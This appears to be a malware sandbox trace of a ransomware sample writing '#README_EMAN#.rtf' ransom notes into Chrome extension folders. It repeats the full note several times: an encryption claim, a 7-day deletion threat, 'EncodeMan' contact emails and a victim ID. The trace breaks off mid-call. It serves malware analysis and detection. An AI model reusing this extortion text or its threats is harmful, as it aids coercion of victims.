D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.094] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.096] CloseHandle (hObject=0x2e8) returned 1 [0292.096] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\#readme_eman#.rtf")) returned 0x20 [0292.096] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0292.097] GetLastError () returned 0x2 [0292.097] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 